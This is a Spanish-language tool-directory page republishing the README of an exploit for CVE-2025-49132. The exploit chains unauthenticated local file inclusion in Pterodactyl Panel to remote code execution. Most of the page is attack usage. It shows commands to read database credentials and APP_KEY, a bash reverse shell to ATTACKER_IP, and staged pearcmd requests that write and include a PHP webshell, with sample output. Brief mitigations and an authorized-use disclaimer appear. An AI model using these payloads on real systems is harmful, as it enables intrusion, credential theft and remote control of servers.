Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-49132 — CVE For Pterodactyl (Para estudio y educación) | Kitploit
Herramientas/GitHubGitHub/popyue/cve-2025-49132
Análisis de VulnerabilidadesAnálisis de CódigoExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de PenetraciónAprendizaje y Educación
GitHubpopyue/cve-2025-49132

CVE-2025-49132

CVE For Pterodactyl (Para estudio y educación)

Ver Repositorio
4hace 6 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-49132 - Exploit del Panel de Pterodactyl

⚠️ Aviso: Este repositorio se crea solo con fines educativos y de investigación como parte de mi investigación de seguridad para entender y documentar CVE-2025-49132. Todo el crédito por el descubrimiento de la vulnerabilidad corresponde al investigador(es) original(es).

root@kitploit:~
  ___ __   __ ___      ___   ___  ___  ___        _  _   ___  _  ____  ___ 
 / __|\ \ / /| __|___ |_  ) / _ \|_  )| __|___   | || | / _ \| ||__ / |_  )
| (__  \ V / | _|___|  / / | (_) |/ / |__ \___|  |_  _| \_, /| ||_ \  / / 
 \___|  \_/  |___|    /___| \___//___||___/        |_|   /_/ |_|___/ /___|

        Panel de Pterodactyl - Exploit de LFI no autenticada a RCE

📋 Descripción

CVE-2025-49132 es una vulnerabilidad de Inclusión de Archivos Locales no Autenticada (LFI) en el Panel de Pterodactyl que puede escalarse a Ejecución Remota de Código (RCE) a través de pearcmd.php de PHP.

La vulnerabilidad existe en el endpoint /locales/locale.json, que no sanitiza adecuadamente los parámetros locale y namespace, permitiendo a atacantes leer archivos de configuración PHP arbitrarios y lograr ejecución de código.

🎯 Versiones Afectadas

EstadoVersión
❌ Vulnerable<= 1.11.10
✅ Parcheado>= 1.11.11

⚡ Características

  • Modo LFI: Leer archivos de configuración PHP (credenciales de base de datos, APP_KEY, etc.)
  • Modo RCE: Ejecución remota de código mediante la técnica LFI2RCE con pearcmd.php
  • Shell Interactivo: Shell persistente para ejecución de múltiples comandos
  • Comando Único: Ejecución de un solo comando
  • Salida Formateada: Salida con códigos de color y formato para mejor legibilidad

📦 Instalación

root@kitploit:~
# Clone the repository
git clone https://github.com/YOUR_USERNAME/CVE-2025-49132.git
cd CVE-2025-49132

# Install dependencies
pip install requests

Requisitos

  • Python 3.6+
  • Librería requests
  • curl (para modo RCE)

🚀 Uso

LFI - Leer Archivos de Configuración

root@kitploit:~
# Read database configuration
python exploit.py -u http://target.com --read -p ../../config -f database

# Read application configuration (contains APP_KEY)
python exploit.py -u http://target.com --read -p ../../config -f app

# Read other configurations
python exploit.py -u http://target.com --read -p ../../config -f auth
python exploit.py -u http://target.com --read -p ../../config -f session
python exploit.py -u http://target.com --read -p ../../config -f mail

RCE - Ejecución Remota de Código

root@kitploit:~
# Single command execution
python exploit.py -u http://target.com --rce -p ../../../../../../usr/share/php/PEAR --cmd "id"
python exploit.py -u http://target.com --rce -p ../../../../../../usr/share/php/PEAR --cmd "whoami"

# Interactive shell mode
python exploit.py -u http://target.com --rce -p ../../../../../../usr/share/php/PEAR

# Reverse shell
python exploit.py -u http://target.com --rce -p ../../../../../../usr/share/php/PEAR --cmd "bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'"

Rutas Comunes de PEAR

DistribuciónRuta
Debian/Ubuntu../../../../../../usr/share/php
SUSE/OpenSUSE../../../../../../usr/share/php/PEAR

📖 Argumentos

🔬 Cómo Funciona

LFI (Inclusión de Archivos Locales)

El endpoint vulnerable /locales/locale.json acepta los parámetros locale y namespace:

root@kitploit:~
GET /locales/locale.json?locale=../../config&namespace=database

Esto permite leer cualquier archivo PHP que devuelva un array, incluyendo archivos de configuración de Laravel.

RCE (Ejecución Remota de Código)

El exploit encadena LFI con pearcmd.php para lograr RCE:

  1. Etapa 1: Usar el comando config-create de pearcmd.php para escribir un webshell PHP

    root@kitploit:~
    /locales/locale.json?+config-create+/&locale=../../../../../../usr/share/php/PEAR&namespace=pearcmd&/<?=system(...)?>+/tmp/shell.php
    
  2. Etapa 2: Incluir el shell escrito mediante LFI

    root@kitploit:~
    /locales/locale.json?locale=../../../../../../tmp&namespace=shell&c=<hex_encoded_cmd>
    

📸 Capturas de Pantalla

LFI - Leyendo Configuración de Base de Datos

root@kitploit:~
════════════════════════════════════════════════════════════
  DATABASE CONFIGURATION
════════════════════════════════════════════════════════════

  default: mysql
  connections:
    mysql:
      driver: mysql
      host: 127.0.0.1
      port: 3306
      database: panel
      username: pterodactyl
      password: SecretPassword123

────────────────────────────────────────────────────────────
[+] Configuration extracted successfully!

RCE - Ejecución de Comandos

root@kitploit:~
[*] Target: http://panel.example.com
[*] Executing command: id
[*] Writing payload to: /tmp/cmd_abc123.php
[+] Output:
----------------------------------------
uid=474(wwwrun) gid=477(www) groups=477(www)
----------------------------------------

🛡️ Mitigación

  1. Actualizar el Panel de Pterodactyl a la versión 1.11.11 o posterior
  2. Implementar una validación adecuada de entrada en los parámetros locale y namespace
  3. Usar una lista blanca para valores válidos de locale/namespace
  4. Restringir la directiva register_argc_argv de PHP

⚠️ Aviso

Esta herramienta se proporciona solo con fines educativos y de pruebas de seguridad autorizadas.

  • Use esta herramienta solo en sistemas de su propiedad o para los que tenga permiso explícito por escrito para realizar pruebas.
  • El acceso no autorizado a sistemas informáticos es ilegal.
  • El autor no es responsable por cualquier mal uso o daño causado por esta herramienta.

Úsela de manera responsable y ética.

📚 Referencias

  • Sitio Oficial de Pterodactyl Panel
  • GitHub de Pterodactyl Panel
  • Detalles de CVE-2025-49132
  • CVE-2025-49132: El Panel de Pterodactyl Permite Ejecución Remota de Código Arbitraria no Autenticada
  • Técnica de LFI a RCE con PEAR
  • PHP Filter Chain Generator
  • Inclusión de Archivos Locales a Ejecución Remota de Código (RCE)

📝 Registro de Cambios

  • v1.0.0 - Lanzamiento inicial
    • Lectura de configuración LFI
    • RCE mediante pearcmd
    • Modo shell interactivo
    • Salida formateada

⭐ ¡Dale una estrella a este repositorio si te resultó útil!

Descargar herramienta
CentOS/RHEL../../../../../../usr/share/pear
Alpine../../../../../../usr/share/php8
ArgumentoDescripción
-u, --urlURL objetivo (requerido)
-p, --pathPath traversal para LFI o ruta de PEAR para RCE
-f, --fileArchivo PHP a leer (sin extensión .php)
--readHabilitar modo de lectura LFI
--rceHabilitar modo RCE
--cmdComando a ejecutar (modo de ejecución única)
--sdirDirectorio para escribir el shell (por defecto: /tmp)
--snameNombre del archivo shell (por defecto: shell)